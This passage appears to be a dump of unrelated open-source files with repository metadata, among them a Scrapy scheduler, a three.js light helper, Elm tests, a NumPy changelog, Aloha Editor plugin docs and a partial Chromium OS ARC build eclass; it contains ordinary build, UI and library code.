:setting:`dupefilter <DUPEFILTER_CLASS>`. This scheduler stores requests into several priority queues (defined by the :setting:`SCHEDULER_PRIORITY_QUEUE` setting). In turn, said priority queues are backed by either memory or disk based queues (respectively defined by the :setting:`SCHEDULER_MEMORY_QUEUE` and :setting:`SCHEDULER_DISK_QUEUE` settings). Request prioritization is almost entirely delegated to the priority queue. The only prioritization performed by this scheduler is using the disk-based queue if present (i.e. if the :setting:`JOBDIR` setting is defined) and falling back to the memory-based queue if a serialization error occurs. If the disk queue is not present, the memory one is used directly. :param dupefilter: An object responsible for checking and filtering duplicate requests. The value for the :setting:`DUPEFILTER_CLASS` setting is used by default. :type dupefilter: :class:`scrapy.dupefilters.BaseDupeFilter` instance or similar: any class that implements the `BaseDupeFilter` interface :param jobdir: The path of a directory to be used for persisting the crawl's state. The value for the :setting:`JOBDIR` setting is used by default. See :ref:`topics-jobs`. :type jobdir: :class:`str` or ``None`` :param dqclass: A class to be used as persistent request queue. The value for the :setting:`SCHEDULER_DISK_QUEUE` setting is used by default. :type dqclass: class :param mqclass: A class to be used as non-persistent request queue. The value for the :setting:`SCHEDULER_MEMORY_QUEUE` setting is used by default. :type mqclass: class :param logunser: A boolean that indicates whether or not unserializable requests should be logged. The value for the :setting:`SCHEDULER_DEBUG` setting is used by default. :type logunser: bool :param stats: A stats collector object to record stats about the request scheduling process. The value for the :setting:`STATS_CLASS` setting is used by default. :type stats: :class:`scrapy.statscollectors.StatsCollector` instance or similar: any class that implements the `StatsCollector` interface :param pqclass: A class to be used as priority queue for requests. The value for the :setting:`SCHEDULER_PRIORITY_QUEUE` setting is used by default. :type pqclass: class :param crawler: The crawler object corresponding to the current crawl. :type crawler: :class:`scrapy.crawler.Crawler` """ def __init__( self, dupefilter, jobdir: Optional[str] = None, dqclass=None, mqclass=None, logunser: bool = False, stats=None, pqclass=None, crawler: Optional[Crawler] = None, ): self.df = dupefilter self.dqdir = self._dqdir(jobdir) self.pqclass = pqclass self.dqclass = dqclass self.mqclass = mqclass self.logunser = logunser self.stats = stats self.crawler = crawler @classmethod def from_crawler(cls: Type[SchedulerTV], crawler) -> SchedulerTV: """ Factory method, initializes the scheduler with arguments taken from the crawl settings """ dupefilter_cls = load_object(crawler.settings['DUPEFILTER_CLASS']) return cls( dupefilter=create_instance(dupefilter_cls, crawler.settings, crawler), jobdir=job_dir(crawler.settings), dqclass=load_object(crawler.settings['SCHEDULER_DISK_QUEUE']), mqclass=load_object(crawler.settings['SCHEDULER_MEMORY_QUEUE']), logunser=crawler.settings.getbool('SCHEDULER_DEBUG'), stats=crawler.stats, pqclass=load_object(crawler.settings['SCHEDULER_PRIORITY_QUEUE']), crawler=crawler, ) def has_pending_requests(self) -> bool: return len(self) > 0 def open(self, spider: Spider) -> Optional[Deferred]: """ (1) initialize the memory queue (2) initialize the disk queue if the ``jobdir`` attribute is a valid directory (3) return the result of the dupefilter's ``open`` method """ self.spider = spider self.mqs = self._mq() self.dqs = self._dq() if self.dqdir else None return self.df.open() def close(self, reason: str) -> Optional[Deferred]: """ (1) dump pending requests to disk if there is a disk queue (2) return the result of the dupefilter's ``close`` method """ if self.dqs is not None: state = self.dqs.close() assert isinstance(self.dqdir, str) self._write_dqs_state(self.dqdir, state) return self.df.close(reason) def enqueue_request(self, request: Request) -> bool: """ Unless the received request is filtered out by the Dupefilter, attempt to push it into the disk queue, falling back to pushing it into the memory queue. Increment the appropriate stats, such as: ``scheduler/enqueued``, ``scheduler/enqueued/disk``, ``scheduler/enqueued/memory``. Return ``True`` if the request was stored successfully, ``False`` otherwise. """ if not request.dont_filter and self.df.request_seen(request): self.df.log(request, self.spider) return False dqok = self._dqpush(request) if dqok: self.stats.inc_value('scheduler/enqueued/disk', spider=self.spider) else: self._mqpush(request) self.stats.inc_value('scheduler/enqueued/memory', spider=self.spider) self.stats.inc_value('scheduler/enqueued', spider=self.spider) return True def next_request(self) -> Optional[Request]: """ Return a :class:`~scrapy.http.Request` object from the memory queue, falling back to the disk queue if the memory queue is empty. Return ``None`` if there are no more enqueued requests. Increment the appropriate stats, such as: ``scheduler/dequeued``, ``scheduler/dequeued/disk``, ``scheduler/dequeued/memory``. """ request = self.mqs.pop() if request is not None: self.stats.inc_value('scheduler/dequeued/memory', spider=self.spider) else: request = self._dqpop() if request is not None: self.stats.inc_value('scheduler/dequeued/disk', spider=self.spider) if request is not None: self.stats.inc_value('scheduler/dequeued', spider=self.spider) return request def __len__(self) -> int: """ Return the total amount of enqueued requests """ return len(self.dqs) + len(self.mqs) if self.dqs is not None else len(self.mqs) def _dqpush(self, request: Request) -> bool: if self.dqs is None: return False try: self.dqs.push(request) except ValueError as e: # non serializable request if self.logunser: msg = ("Unable to serialize request: %(request)s - reason:" " %(reason)s - no more unserializable requests will be" " logged (stats being collected)") logger.warning(msg, {'request': request, 'reason': e}, exc_info=True, extra={'spider': self.spider}) self.logunser = False self.stats.inc_value('scheduler/unserializable', spider=self.spider) return False else: return True def _mqpush(self, request: Request) -> None: self.mqs.push(request) def _dqpop(self) -> Optional[Request]: if self.dqs is not None: return self.dqs.pop() return None def _mq(self): """ Create a new priority queue instance, with in-memory storage """ return create_instance(self.pqclass, settings=None, crawler=self.crawler, downstream_queue_cls=self.mqclass, key='') def _dq(self): """ Create a new priority queue instance, with disk storage """ state = self._read_dqs_state(self.dqdir) q = create_instance(self.pqclass, settings=None, crawler=self.crawler, downstream_queue_cls=self.dqclass, key=self.dqdir, startprios=state) if q: logger.info("Resuming crawl (%(queuesize)d requests scheduled)", {'queuesize': len(q)}, extra={'spider': self.spider}) return q def _dqdir(self, jobdir: Optional[str]) -> Optional[str]: """ Return a folder name to keep disk queue state at """ if jobdir is not None: dqdir = join(jobdir, 'requests.queue') if not exists(dqdir): os.makedirs(dqdir) return dqdir return None def _read_dqs_state(self, dqdir: str) -> list: path = join(dqdir, 'active.json') if not exists(path): return [] with open(path) as f: return json.load(f) def _write_dqs_state(self, dqdir: str, state: list) -> None: with open(join(dqdir, 'active.json'), 'w') as f: json.dump(state, f)
Python
4
FingerCrunch/scrapy
scrapy/core/scheduler.py
[ "BSD-3-Clause" ]
import { Vector3 } from '../math/Vector3.js'; import { Color } from '../math/Color.js'; import { Object3D } from '../core/Object3D.js'; import { Mesh } from '../objects/Mesh.js'; import { MeshBasicMaterial } from '../materials/MeshBasicMaterial.js'; import { OctahedronGeometry } from '../geometries/OctahedronGeometry.js'; import { BufferAttribute } from '../core/BufferAttribute.js'; const _vector = /*@__PURE__*/ new Vector3(); const _color1 = /*@__PURE__*/ new Color(); const _color2 = /*@__PURE__*/ new Color(); class HemisphereLightHelper extends Object3D { constructor( light, size, color ) { super(); this.light = light; this.light.updateMatrixWorld(); this.matrix = light.matrixWorld; this.matrixAutoUpdate = false; this.color = color; const geometry = new OctahedronGeometry( size ); geometry.rotateY( Math.PI * 0.5 ); this.material = new MeshBasicMaterial( { wireframe: true, fog: false, toneMapped: false } ); if ( this.color === undefined ) this.material.vertexColors = true; const position = geometry.getAttribute( 'position' ); const colors = new Float32Array( position.count * 3 ); geometry.setAttribute( 'color', new BufferAttribute( colors, 3 ) ); this.add( new Mesh( geometry, this.material ) ); this.update(); } dispose() { this.children[ 0 ].geometry.dispose(); this.children[ 0 ].material.dispose(); } update() { const mesh = this.children[ 0 ]; if ( this.color !== undefined ) { this.material.color.set( this.color ); } else { const colors = mesh.geometry.getAttribute( 'color' ); _color1.copy( this.light.color ); _color2.copy( this.light.groundColor ); for ( let i = 0, l = colors.count; i < l; i ++ ) { const color = ( i < ( l / 2 ) ) ? _color1 : _color2; colors.setXYZ( i, color.r, color.g, color.b ); } colors.needsUpdate = true; } mesh.lookAt( _vector.setFromMatrixPosition( this.light.matrixWorld ).negate() ); } } export { HemisphereLightHelper };
JavaScript
5
o7878x/three.js
src/helpers/HemisphereLightHelper.js
[ "MIT" ]
{ width: 240, height: 240, fps: 14, outPath: './ph.gif', defaults: { transition: { duration: 0.4 }, layer: { fontPath: './assets/Patua_One/PatuaOne-Regular.ttf' }, }, clips: [ { duration: 1, transition: { name: 'directionalWarp' }, layers: [{ type: 'image', path: './assets/vertical.jpg', zoomDirection: 'out' }, { type: 'title', text: 'EDITLY' }] }, { duration: 1.5, transition: { name: 'dreamyzoom' }, layers: [{ type: 'image', path: './assets/img1.jpg', duration: 2.5, zoomDirection: 'in' }, { type: 'title', position: 'bottom', text: 'Video editing API' }] }, { duration: 2, layers: [ { type: 'image', path: './assets/91083241_573589476840991_4224678072281051330_n.jpg' }, { type: 'news-title', text: 'EDITLY' }, { type: 'subtitle', text: 'Get it from npm', backgroundColor: 'rgba(0,0,0,0.5)' } ] }, ], }
JSON5
4
aaverty/editly
examples/ph.json5
[ "MIT" ]
background hsv(210,255,255) color white m: map(wave(1000), 0,1, -5,5) move 0,0,m stroke 4 rotate 45, 1,1,0 push for i:0 to 10 step 1 rotate 3 box 0.25 + F2*2 end pop stroke 2 color red do 10 times rotate 1 scale 1.1 sphere map(wave(1000), 0,1,0.3,10) end
Cycript
3
marcinbiegun/creativecoding-sketches
Cyril/data/code_retro/1.cy
[ "MIT" ]
--- layout: base --- {%- assign _page_mode = page.mode | default: layout.mode | default: site.data.variables.default.page.mode -%} {%- assign _page_type = page.type | default: layout.type | default: site.data.variables.default.page.type -%} {%- assign _article_header_type = page.article_header.type | default: layout.article_header.type -%} {%- include snippets/assign.html target=layout.header source0=page.header -%} {%- assign _header = __return -%} {%- include snippets/assign.html target=layout.footer source0=page.footer -%} {%- assign _footer = __return -%} {%- include snippets/assign.html target=layout.lightbox source0=page.lightbox -%} {%- assign _lightbox = __return -%} {%- include snippets/assign.html target = site.data.variables.default.page.full_width source0=layout.full_width source1=page.full_width -%} {%- assign _full_width = __return -%} {%- include snippets/assign.html target = site.data.variables.default.page.comment source0=layout.comment source1=page.comment -%} {%- assign _comment = __return -%} {%- assign _article_header_excerpt_truncate = include.excerpt_truncate | default: 200 -%} {%- if page.sidebar -%} <div class="layout--page layout--page--sidebar clearfix js-page-root"> <div class="page__mask d-print-none js-page-mask js-sidebar-hide"></div> <div class="page__viewport"> <div class="page__actions d-print-none"> <div class="button button--circle button--lg box-shadow-2 sidebar-button js-sidebar-show"> <i class="fas fa-bars icon--show"></i> </div> </div> <div class="grid page__grid"> <div class="page__sidebar d-print-none"> {%- include sidebar/toc.html -%} </div> {%- else -%} <div class="layout--page js-page-root"> {%- endif -%} {%- assign _page_main_class = 'page__main js-page-main' -%} {%- if _page_mode == 'immersive' -%} {%- assign _page_main_class = _page_main_class | append: ' page__main--immersive' -%} {%- endif -%} {%- unless page.sidebar -%} {%- assign _page_main_class = _page_main_class | append: ' page__viewport' -%} {%- endunless -%} {%- if _footer == false -%} {%- assign _page_main_class = _page_main_class | append: ' hide-footer' -%} {%- endif -%} {%- if page.aside -%} {%- assign _page_main_class = _page_main_class | append: ' has-aside' -%} {%- elsif _full_width -%} {%- assign _page_main_class = _page_main_class | append: ' full-width' -%} {%- endif -%} <div class="{{ _page_main_class }} cell cell--auto"> <div class="page__main-inner"> {%- if _header != false -%} <div class="page__header d-print-none"> {%- assign _header_theme = page.header.theme | default: layout.header.theme -%} {%- if _header_theme == 'dark'-%} {%- include header.html theme='dark' background=page.header.background -%} {%- elsif _header_theme == 'light' -%} {%- include header.html theme='light' background=page.header.background -%} {%- else -%} {%- include header.html -%} {%- endif -%} </div> {%- endif -%} <div class="page__content"> {%- if _article_header_type == 'overlay' or _article_header_type == 'cover' -%} {%- if _article_header_type == 'overlay' -%} {%- assign _article_header_height = page.article_header.height | default: layout.article_header.height -%} {%- assign _article_header_align = page.article_header.align | default: layout.article_header.align | default: site.data.variables.default.page.article_header.align -%} {%- assign _article_header_theme = page.article_header.theme | default: layout.article_header.theme | default: site.data.variables.default.page.article_header.theme -%} {%- if page.article_header.background_image.src -%} {%- assign _header_background_image_src = page.article_header.background_image.src -%} {%- elsif page.article_header.background_image != false and page.cover -%} {%- assign _header_background_image_src = page.cover -%} {%- endif -%} {%- if page.article_header.background_image.gradient -%} {%- assign _header_background_image = page.article_header.background_image.gradient -%} {%- if _header_background_image_src -%} {%- assign _header_background_image = _header_background_image | append: ',' -%} {%- endif -%} {%- endif -%} {%- if _header_background_image_src -%} {%- include snippets/get-nav-url.html path=_header_background_image_src -%} {%- assign _header_background_image_src = __return -%} {%- assign _header_background_image = _header_background_image | append: 'url(' | append: _header_background_image_src | append: ')'-%} {%- endif -%} {%- assign _header_style = 'background-image:' | append: _header_background_image | append: ';' -%} {%- if page.article_header.background_color -%} {%- assign _header_style = _header_style | append: 'background-color:' | append: page.article_header.background_color | append: ';' -%} {%- endif -%} {%- if _article_header_height -%} {%- assign _header_style = _header_style | append: 'min-height:' | append: _article_header_height | append: ';' -%} {%- endif -%} <div class="article__header--overlay"> {%- if _article_header_theme == 'light' -%} {%- if _article_header_align == 'center' -%} <div class="hero hero--center hero--light overlay" style="{{ _header_style }}"> {%- else -%} <div class="hero hero--light overlay" style="{{ _header_style }}"> {%- endif -%} {%- elsif _article_header_theme == 'dark' -%} {%- if _article_header_align == 'center' -%} <div class="hero hero--center hero--dark overlay" style="{{ _header_style }}"> {%- else -%} <div class="hero hero--dark overlay" style="{{ _header_style }}"> {%- endif -%} {%- else -%} {%- if _article_header_align == 'center' -%} <div class="hero hero--center overlay" style="{{ _header_style }}"> {%- else -%} <div class="hero overlay" style="{{ _header_style }}"> {%- endif -%} {%- endif -%} <div class="hero__content"> {%- if _full_width == false -%} <div class ="main"> {%- endif -%} {%- include article-info.html article=page semantic=false -%} {%- include article-header.html article=page semantic=false -%} {%- if page.excerpt -%} <p class="overlay__excerpt">{{ page.excerpt | strip_html | strip_newlines | strip | truncate: _article_header_excerpt_truncate }}</p> {%- endif -%} {%- if page.article_header.actions -%} <ul class="menu"> {%- for _action in page.article_header.actions -%} {%- include snippets/get-nav-url.html path=_action.url -%} {%- assign _url = __return -%} {%- assign _type = _action.type | default: 'info' -%} <li><a class="button button--{{ _type }} button--rounded button--xl" href="{{ _url }}">{{ _action.text }}</a></li> {%- endfor -%} </ul> {%- endif -%} {%- if _full_width == false -%} </div> {%- endif -%} </div> </div> </div> {%- elsif _article_header_type == 'cover' -%} {%- if page.article_header.image.src -%} {%- include snippets/get-nav-url.html path=page.article_header.image.src -%} {%- assign _header_image_src = __return -%} <img class="article__header--cover" src="{{ _header_image_src }}"></img> {%- endif -%} {%- endif -%} {%- endif -%} {%- if _full_width == false -%} <div class ="main"> {%- endif -%} <div class="grid grid--reverse"> <div class="col-aside d-print-none js-col-aside"> {%- if page.aside -%} <aside class="page__aside js-page-aside"> {%- include aside/toc.html -%} </aside> {%- endif -%} </div> <div class="col-main cell cell--auto"> {%- include main/top/custom.html -%} {%- if _page_type == 'article' -%} <article itemscope itemtype="http://schema.org/Article"> {%- elsif _page_type == 'webpage' -%} <article itemscope itemtype="http://schema.org/WebPage"> {%- else -%} <article> {%- endif -%} {%- if _article_header_type == 'overlay' or page.article_header == false -%} {%- include article-header.html article=page html=false -%} {%- include article-info.html article=page html=false -%} {%- else -%} {%- include article-header.html article=page -%} {%- include article-info.html article=page -%} {%- endif -%} <div class="js-article-content">{{ content }}</div> {%- if _comment != false -%} <section class="page__comments d-print-none">{%- include comments.html -%}</section> {%- endif -%} </article> {%- include main/bottom/custom.html -%} </div> </div> {%- if _full_width == false -%} </div> {%- endif -%} </div> {%- if _footer != false -%} <div class="page__footer d-print-none">{%- include footer.html -%}</div> {%- endif -%} </div> </div> {%- comment -%} end page__main {%- endcomment -%} {%- if page.sidebar -%} </div> {%- comment -%} end grid {%- endcomment -%} </div> {%- comment -%} end page__viewport {%- endcomment -%} {%- endif -%} <script>{%- include scripts/lib/modal.js -%}</script> {%- if _lightbox == true -%} <div class="modal d-print-none js-page-gallery-modal"><div class="gallery"></div></div> {%- endif -%} {%- if _header != false -%} <div class="modal modal--overflow page__search-modal d-print-none js-page-search-modal">{%- include search.html -%}</div> {%- endif -%} </div> <script> {%- include scripts/lib/scroll-to.js -%} {%- include scripts/lib/affix.js -%} {%- include scripts/lib/toc.js -%} {%- if _lightbox == true -%} {%- include scripts/lib/gallery.js -%} {%- include scripts/components/lightbox.js -%} {%- endif -%} {%- include scripts/page.js -%} </script> {%- if page.sidebar -%} <script>{%- include scripts/components/sidebar.js -%}</script> {%- endif -%} {%- if page.aside -%} <script> /* toc must before affix, since affix need to konw toc' height. */ {%- if page.aside.toc -%}{%- include scripts/aside/toc.js -%}{%- endif -%} {%- include scripts/aside/affix.js -%} </script> {%- endif -%} {%- include markdown-enhancements.html -%} {%- include pageview.html -%}
HTML
3
matt783/matt783.github.io
_layouts/page.html
[ "MIT" ]
{ "status": "Pulling fs layer", "progressDetail": { }, "id": "d837a2a1365e" }
JSON
0
dreamwy9/spring-boot
spring-boot-project/spring-boot-tools/spring-boot-buildpack-platform/src/test/resources/org/springframework/boot/buildpack/platform/docker/pull-with-empty-details.json
[ "Apache-2.0" ]
module Views.CommentBarTests exposing (all) import Expect import Message.Effects exposing (Effect(..), toHtmlID) import Message.Message exposing (CommentBarButtonKind(..), DomID(..), Message(..)) import Message.Subscription exposing (Delivery(..)) import Test exposing (Test, describe, test) import Views.CommentBar exposing (Model, State(..), defaultStyle, getContent, getTextareaID, handleDelivery, setCachedContent, update) all : Test all = describe "comment bar" [ describe "update / view methods" [ describe "handleDelivery" [ test "synchronizes text area when window is resized" <| \_ -> model (Viewing "") |> handleDelivery (WindowResized 1.0 1.0) |> (\( m, effs ) -> Expect.equal [ SyncTextareaHeight (getTextareaID m) ] effs) ] , describe "update" (let saveComment = \content -> SetBuildComment 0 content in [ test "clicking edit button transitions from 'Viewing' to 'Editing'" <| \_ -> model (Viewing "") |> update (Click (CommentBarButton Edit BuildComment)) saveComment |> Tuple.first |> (\m -> Expect.equal (Editing { content = "", cached = "" }) m.state) , test "clicking edit button focuses text area" <| \_ -> model (Viewing "") |> update (Click (CommentBarButton Edit BuildComment)) saveComment |> (\( m, effs ) -> Expect.equal [ Focus <| toHtmlID <| getTextareaID m ] effs) , test "clicking save button (with changes) triggers save event" <| \_ -> model (Editing { content = "data", cached = "" }) |> update (Click (CommentBarButton Save BuildComment)) saveComment |> Tuple.second |> Expect.equal [ SetBuildComment 0 "data" ] , test "clicking save button (with changes) sets state to 'Saving'" <| \_ -> model (Editing { content = "data", cached = "" }) |> update (Click (CommentBarButton Save BuildComment)) saveComment |> Tuple.first |> (\m -> Expect.equal (Saving { content = "data", cached = "" }) m.state) , test "clicking save button (without changes) doesn't trigger save event" <| \_ -> model (Editing { content = "data", cached = "data" }) |> update (Click (CommentBarButton Save BuildComment)) saveComment |> Tuple.second |> Expect.equal [] , test "clicking save button (without changes) resets state to 'Viewing'" <| \_ -> model (Editing { content = "", cached = "" }) |> update (Click (CommentBarButton Save BuildComment)) saveComment |> Tuple.first |> (\m -> Expect.equal (Viewing "") m.state) , test "editing contents updates state" <| \_ -> model (Editing { content = "", cached = "" }) |> update (EditCommentBar BuildComment "test") saveComment |> Tuple.first |> (\m -> Expect.equal (Editing { content = "test", cached = "" }) m.state) , test "editing contents synchronizes text area" <| \_ -> model (Editing { content = "", cached = "" }) |> update (EditCommentBar BuildComment "test") saveComment |> (\( m, effs ) -> Expect.equal [ SyncTextareaHeight <| getTextareaID m ] effs) ] ) ] , describe "miscellaneous methods" [ describe "getContent" [ test "State = Viewing" <| \_ -> model (Viewing "hello-world") |> getContent |> Expect.equal "hello-world" , test "State = Editing" <| \_ -> model (Editing { content = "abc-123", cached = "" }) |> getContent |> Expect.equal "abc-123" , test "State = Saving" <| \_ -> model (Saving { content = "hello-worlds", cached = "" }) |> getContent |> Expect.equal "hello-worlds" ] , describe "setCachedContent" (let runTest = \expected -> setCachedContent expected >> (\m -> case m.state of Viewing _ -> Expect.pass Editing { cached } -> Expect.equal expected cached Saving { cached } -> Expect.equal expected cached ) in [ test "State = Viewing" <| \_ -> model (Viewing "hello-world") |> runTest "hello-world" , test "State = Editing" <| \_ -> model (Editing { content = "abc-123", cached = "" }) |> runTest "abc-123" , test "State = Saving" <| \_ -> model (Saving { content = "hello-worlds", cached = "" }) |> runTest "hello-world" ] ) ] ] model : State -> Model model state = { id = BuildComment , state = state , style = defaultStyle }
Elm
5
Caprowni/concourse
web/elm/tests/Views/CommentBarTests.elm
[ "Apache-2.0" ]
# Copyright (C) 2012, Parrot Foundation. set S1, binary:"%Ec" set S2, binary:"\xC2\x80" set S3, binary:"ABCX" set S4, utf8:"\xC4rger" print S0 print "\n" print S1 print "\n" print S2 print "\n" print S3 print "\n" print S4 print "\n" end # Local Variables: # mode: pir # fill-column: 100 # End: # vim: expandtab shiftwidth=4 ft=pir:
Parrot Assembly
3
winnit-myself/Wifie
t/native_pbc/testdata/string.pasm
[ "Artistic-2.0" ]
Contributors ============ A total of 12 people contributed to this release. People with a "+" by their names contributed a patch for the first time. * Andras Deak + * Bob Eldering + * Charles Harris * Daniel Hrisca + * Eric Wieser * Joshua Leahy + * Julian Taylor * Michael Seifert * Pauli Virtanen * Ralf Gommers * Roland Kaufmann * Warren Weckesser Pull requests merged ==================== A total of 19 pull requests were merged for this release. * `#9240 <https://github.com/numpy/numpy/pull/9240>`__: DOC: BLD: fix lots of Sphinx warnings/errors. * `#9255 <https://github.com/numpy/numpy/pull/9255>`__: Revert "DEP: Raise TypeError for subtract(bool_, bool_)." * `#9261 <https://github.com/numpy/numpy/pull/9261>`__: BUG: don't elide into readonly and updateifcopy temporaries for... * `#9262 <https://github.com/numpy/numpy/pull/9262>`__: BUG: fix missing keyword rename for common block in numpy.f2py * `#9263 <https://github.com/numpy/numpy/pull/9263>`__: BUG: handle resize of 0d array * `#9267 <https://github.com/numpy/numpy/pull/9267>`__: DOC: update f2py front page and some doc build metadata. * `#9299 <https://github.com/numpy/numpy/pull/9299>`__: BUG: Fix Intel compilation on Unix. * `#9317 <https://github.com/numpy/numpy/pull/9317>`__: BUG: fix wrong ndim used in empty where check * `#9319 <https://github.com/numpy/numpy/pull/9319>`__: BUG: Make extensions compilable with MinGW on Py2.7 * `#9339 <https://github.com/numpy/numpy/pull/9339>`__: BUG: Prevent crash if ufunc doc string is null * `#9340 <https://github.com/numpy/numpy/pull/9340>`__: BUG: umath: un-break ufunc where= when no out= is given * `#9371 <https://github.com/numpy/numpy/pull/9371>`__: DOC: Add isnat/positive ufunc to documentation * `#9372 <https://github.com/numpy/numpy/pull/9372>`__: BUG: Fix error in fromstring function from numpy.core.records... * `#9373 <https://github.com/numpy/numpy/pull/9373>`__: BUG: ')' is printed at the end pointer of the buffer in numpy.f2py. * `#9374 <https://github.com/numpy/numpy/pull/9374>`__: DOC: Create NumPy 1.13.1 release notes. * `#9376 <https://github.com/numpy/numpy/pull/9376>`__: BUG: Prevent hang traversing ufunc userloop linked list * `#9377 <https://github.com/numpy/numpy/pull/9377>`__: DOC: Use x1 and x2 in the heaviside docstring. * `#9378 <https://github.com/numpy/numpy/pull/9378>`__: DOC: Add $PARAMS to the isnat docstring * `#9379 <https://github.com/numpy/numpy/pull/9379>`__: DOC: Update the 1.13.1 release notes
reStructuredText
0
iam-abbas/numpy
doc/changelog/1.13.1-changelog.rst
[ "BSD-3-Clause" ]
h2. Formatless Paste Plugin The formatless paste plugin can be used to strip HTML tags from pasted content. endprologue. h3. Overview With this plugin HTML tags can be removed from pasted content. It provides the following features * Strip a configurable set of tags from pasted content * Enabled / disabled via a button in the floating menu * Configure the default behaviour (enabled/disabled) h3. Usage Select some text from a website or document you want to insert and copy it to your clipboard Crtl + C Position the cursor where you want the pasted content to be placed.<br /> If you want the content to be pasted "formatless" click the "Toggle Formatless Pasting" button. <img src="images/plugins/formatlesspaste-01.png" style="width:620px"> Press Crtl + V to insert the content from the clipboard.<br /> In this case we strip all formating like bold, italic and so on but allow a-Tags. <img src="images/plugins/formatlesspaste-02.png" style="width:620px"> h3. Components * Button to toggle enable / disable the button h3. Configuration The default behaviour can be configured with the setting "formatlessPasteOption". The set of elements that should be stripped can be configured with the setting "strippedElements". The default configuration looks like this: <javascript> Aloha.settings.plugins: { formatlesspaste: { config: { button: true, // if set to false the button will be hidden formatlessPasteOption: true, // default state of the button strippedElements: [ // elements to be stripped from the pasted code "a", "em", "strong", "small", "s", "cite", "q", "dfn", "abbr", "time", "code", "var", "samp", "kbd", "sub", "sup", "i", "b", "u", "mark", "ruby", "rt", "rp", "bdi", "bdo", "ins", "del" ] } } } </javascript> NOTE: The @button@ and @formatlessPasteOption@ config property will accept boolean or string values. Boolean @false@, @'false'@ or @'0'@ will hide the button while boolean @true@ or any other string value will show it. You can also have configurations for individual editables: <javascript> Aloha.settings.contentHandler = { insertHtml: ["formatless"] }; Aloha.settings.plugins: { formatlesspaste: { config: { formatlessPasteOption: true, // default state of the button }, editables: { '#one' : { button: false, // hides the button in this editable formatlessPasteOption: true, // will always activate formatless paste when this editable is activated strippedElements: [ 'a' ] // only remove anchor tags when pasting to this editable } } } } </javascript> h3. Testing the Plugin Have a look at the "test protocol":/plugin_formatlesspaste_test.html
Textile
4
luciany/Aloha-Editor
doc/guides/source/plugin_formatlesspaste.textile
[ "CC-BY-3.0" ]
.heroes { list-style-type: none; padding: 0; } .heroes li { overflow:hidden; margin: .5em 0; } .heroes li > .inner { cursor: pointer; background-color: #EEE; padding: .3rem 0; height: 1.6rem; border-radius: 4px; } .heroes li:hover > .inner { color: black; background-color: #DDD; transform: translateX(.1em); } .heroes .badge { display: inline-block; font-size: small; color: white; padding: 0.8em 0.7em 0 0.7em; background-color: #3d5157; position: relative; left: -1px; top: -4px; height: 1.8em; min-width: 16px; text-align: right; margin-right: .8em; border-radius: 4px 0 0 4px; } label { display: block; padding-bottom: .5rem; } input { font-size: 100%; margin-bottom: 1rem; }
CSS
4
yuchenghu/angular-cn
aio/content/examples/animations/src/app/hero-list-page.component.css
[ "MIT" ]
# Copyright (c) 2022 Fyde Innovations Limited and the openFyde Authors. # Distributed under the license specified in the root directory of this project. # Copyright 2016 The Chromium OS Authors. All rights reserved. # Distributed under the terms of the GNU General Public License v2 # @ECLASS: arc-build.eclass # @MAINTAINER: # Chromium OS Build Team # @BUGREPORTS: # Please report bugs via http://crbug.com/new (with label Build) # @VCSURL: https://chromium.googlesource.com/chromiumos/overlays/chromiumos-overlay/+/master/eclass/@ECLASS@ # @BLURB: helper eclass for building packages to run under ARC (Android Runtime) # @DESCRIPTION: # We want to build some libraries to run under ARC. These funcs will help # write ebuilds to accomplish that. # @ECLASS-VARIABLE: ARC_BASE # @DESCRIPTION: # The path to ARC toolchain root directory. Normally defined by the profile. # e.g. /opt/android-master, for sys-devel/arc-toolchain-master # @ECLASS-VARIABLE: ARC_VERSION_MAJOR # @DESCRIPTION: # Major version of Android that was used to generate the ARC toolchain. # Normally defined by the profile. e.g. 7, for Android 7.1.0 # @ECLASS-VARIABLE: ARC_VERSION_MINOR # @DESCRIPTION: # Minor version of Android that was used to generate the ARC toolchain. # Normally defined by the profile. e.g. 1, for Android 7.1.0 # @ECLASS-VARIABLE: ARC_VERSION_PATCH # @DESCRIPTION: # Minor version of Android that was used to generate the ARC toolchain. # Normally defined by the profile. e.g. 0, for Android 7.1.0 # @ECLASS-VARIABLE: ARC_LLVM_VERSION # @DESCRIPTION: # Version of LLVM included in the ARC toolchain. # Normally defined by the profile, e.g. 3.8 if [[ -z ${_ARC_BUILD_ECLASS} ]]; then _ARC_BUILD_ECLASS=1 # Check for EAPI 4+. case "${EAPI:-0}" in 4|5|6|7) ;; *) die "unsupported EAPI (${EAPI}) in eclass (${ECLASS})" ;; esac inherit multilib-build flag-o-matic cros-constants arc-build-constants DEPEND="sys-devel/arc-build[${MULTILIB_USEDEP}]" # Make sure we know how to handle the active system. arc-build-check-arch() { case ${ARCH} in arm|arm64|amd64) ;; *) die "Unsupported arch ${ARCH}" ;; esac } arc-build-select-clang() { if [[ -n ${ARC_SYSROOT} ]] ; then # If we've already been set up, don't re-run. die "arc-build must be initialized only once. Please fix your ebuild." fi arc-build-constants-configure arc-build-check-arch export ARC_SYSROOT="${SYSROOT}${ARC_PREFIX}" export PKG_CONFIG="${ARC_SYSROOT}/build/bin/pkg-config" case ${ARCH} in arm|arm64) ARC_GCC_TUPLE_arm64=aarch64-linux-android ARC_GCC_BASE_arm64="${ARC_BASE}/arc-gcc/aarch64/${ARC_GCC_TUPLE_arm64}-4.9" ARC_GCC_TUPLE_arm=arm-linux-androideabi ARC_GCC_BASE_arm="${ARC_BASE}/arc-gcc/arm/${ARC_GCC_TUPLE_arm}-4.9" # multilib.eclass does not use CFLAGS_${DEFAULT_ABI}, but # we need to add some flags valid only for arm/arm64, so we trick # it to think that neither arm nor arm64 is the default. export DEFAULT_ABI=none export CHOST=aarch64-linux-android export CHOST_arm64=aarch64-linux-android export CHOST_arm=armv7a-linux-androideabi # Android uses softfp ABI filter-flags -mfloat-abi=hard CFLAGS_arm="${CFLAGS_arm} -mfloat-abi=softfp" CFLAGS_arm64="${CFLAGS_arm64} -I${ARC_SYSROOT}/usr/include/arch-arm64/include/" CFLAGS_arm="${CFLAGS_arm} -I${ARC_SYSROOT}/usr/include/arch-arm/include/" export CFLAGS_arm64="${CFLAGS_arm64} -target ${CHOST_arm64} --gcc-toolchain=${ARC_GCC_BASE_arm64}" export CFLAGS_arm="${CFLAGS_arm} -target ${CHOST_arm} --gcc-toolchain=${ARC_GCC_BASE_arm}" # Add Android related utilities location to ${PATH}. export PATH="${ARC_GCC_BASE_arm64}/bin:${ARC_GCC_BASE_arm}/bin:${PATH}" ;; amd64) ARC_GCC_TUPLE=x86_64-linux-android ARC_GCC_BASE="${ARC_BASE}/arc-gcc/x86_64/${ARC_GCC_TUPLE}-4.9" # The clang version used by ARC is too old to 